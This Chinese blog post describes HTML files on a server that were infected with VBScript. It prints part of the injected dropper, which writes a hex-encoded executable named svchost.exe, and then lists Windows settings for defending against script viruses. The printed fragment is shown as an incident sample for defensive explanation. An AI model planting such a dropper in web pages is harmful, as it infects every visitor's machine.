怎样防范vbs脚本病毒

https://blog.csdn.net/persistencegoing/article/details/84376427

大早上，发现服务器被人攻击了，所有的 html 都被植入了一段 vbscript

<!DOCTYPE html>

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />

<title>这是网页标题</title>

</head>

<body></body>

</html><SCRIPT Language=VBScript><!--

DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010

这是部分代码

vbs病毒是使用VBScript编写的，因为编写简单，经常被用到。那么，怎样防范vbs脚本病毒呢？一起了解下吧。

1)禁用文件系统对象FileSystemObject

方法：用regsvr32scrrun.dll/u这条命令就可以禁止文件系统对象。其中regsvr32是Windows\System下的可执行文件。或者直接查找scrrun.dll文件删除或者改名。

还有一种方法就是在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键{0D43FE01-F093-11CF-8940-00A0C9054228}的项，咔嚓即可。

2)卸载WindowsScriptingHost

在Windows98中(NT4.0以上同理)，打开[控制面板]→[添加/删除程序]→[Windows安装程序]→[附件]，取消“WindowsScriptingHost”一项。

和上面的方法一样，在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}的项，咔嚓。

3)删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射

点击[我的电脑]→[查看]→[文件夹选项]→[文件类型]，然后删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射。

4)在Windows目录中，找到WScript.exe，更改名称或者删除

如果你觉得以后有机会用到的话，最好更改名称好了，当然以后也可以重新装上。

5)要彻底防治VBS网络蠕虫病毒，还需设置一下你的浏览器

我们首先打开浏览器，单击菜单栏里“Internet选项”安全选项卡里的[自定义级别]按钮。把“ActiveX控件及插件”的一切设为禁用，这样就不怕了。呵呵，譬如新欢乐时光的那个ActiveX组件如果不能运行，网络传播这项功能就玩完了。

6)禁止OE的自动收发邮件功能

7)由于蠕虫病毒大多利用文件扩展名作文章，所以要防范它就不要隐藏系统中已知文件类型的扩展名

Windows默认的是“隐藏已知文件类型的扩展名称”，将其修改为显示所有文件类型的扩展名称。

8)将系统的网络连接的安全级别设置至少为“中等”

它可以在一定程度上预防某些有害的Java程序或者某些ActiveX组件对计算机的侵害。

最后友情提醒，预防vbs脚本病毒，杀毒软件确实很必要，尽管有些杀毒软件挺让广大用户失望，不过，选择是双方的哦。在这个病毒横飞的网络，如果您的机器没有装上杀毒软件我觉得确实挺不可思议的。

希望大家关注我一波,防止以后迷路,有需要的可以加群讨论互相学习java ,学习路线探讨,经验分享与java求职群号:721515304

怎样防范vbs脚本病毒相关推荐

VBS脚本病毒总结与分析
赞赏码 & 联系方式 & 个人闲话这篇文章其实是我的结课论文,整个病毒分析的课上完感觉就对VBS病毒有点兴趣,期末也就写这个当大作业了,PE病毒实在烧脑只能说声打扰了.这门课其实也和 ...
VBS脚本病毒的特点！
VBS病毒是用VB Script编写而成的,该脚本语言功能非常强大,它们利用Windows系统的开放性特点, 通过调用一些现成的Windous对象,组件,可以直接对文件系统,注册表等进行控制,功能非常 ...
html自动增加vbs代码,vbs脚本病毒代码大全编步骤四个
应用程序通过ActiveX的属性HTMLPageTextWithTags(主页不嵌有HTML代码时用属性HTMLPageTextWithOutTags)读页面文本交互模式:允许显示用户提示和脚本错误 ...
vbs病毒分析神技——使用VS2017调试vbs脚本
文章目录设置VS2017调试器启动调试器开始调试参考资料在分析VBS类的文档病毒的时候,通常会因为病毒加密问题感到头疼,如果加密了好几层,只能用MsgBox或者输出到文件,一层一层解密,但是 ...
今天中了一个脚本病毒。把我的所有 html 加了 vbs 脚本，WriteData 是什么鬼？
今天中了一个脚本病毒.把我的所有 html 加了 vbs 脚本: WriteData 是什么鬼? <SCRIPT Language=VBScript><!-- DropFileNam ...
Trojan.DL.VBS.Agent.r 脚本病毒 ASP解密
Trojan.DL.VBS.Agent.r 脚本病毒 ASP解密 2011年04月18日 Trojan.DL.VBS.Agent.r 脚本病毒问题:1.Trojan.DL.VBS.Agent.r 的 ...
vbs脚本在服务器上虚拟按键,iisvdir.vbs iis虚拟目录管理脚本使用介绍
IIS管理器也是通过调用iisvdir.vbs来实现虚拟目录的创建和删除的.我们可以通过命令行的方式来执行iisvdir.vbs脚本 1)创建虚拟目录: cscript c:\windows\syst ...
VBS脚本常用经典代码收集
在网上查找资料的时候发现好多经典的vbs代码,收集起来也为了以后学习. VBS脚本用途很多: 1. 计算 2. 处理文件和文件夹 3. 管理Windows 4. 处理Word, Excel, Powe ...
VBS脚本和HTML DOM自动操作网页
本来是想通过JS实现对其他页面的控制,发现跨域无法获取页面DOM来操作.接着考虑bat,发现也实现不了,于是想到vbs.vbs还是很强大啊,病毒之类很多都是vbs脚本啊.vbs打开浏览器,然后通过do ...

怎样防范vbs脚本病毒

怎样防范vbs脚本病毒相关推荐

最新文章

热门文章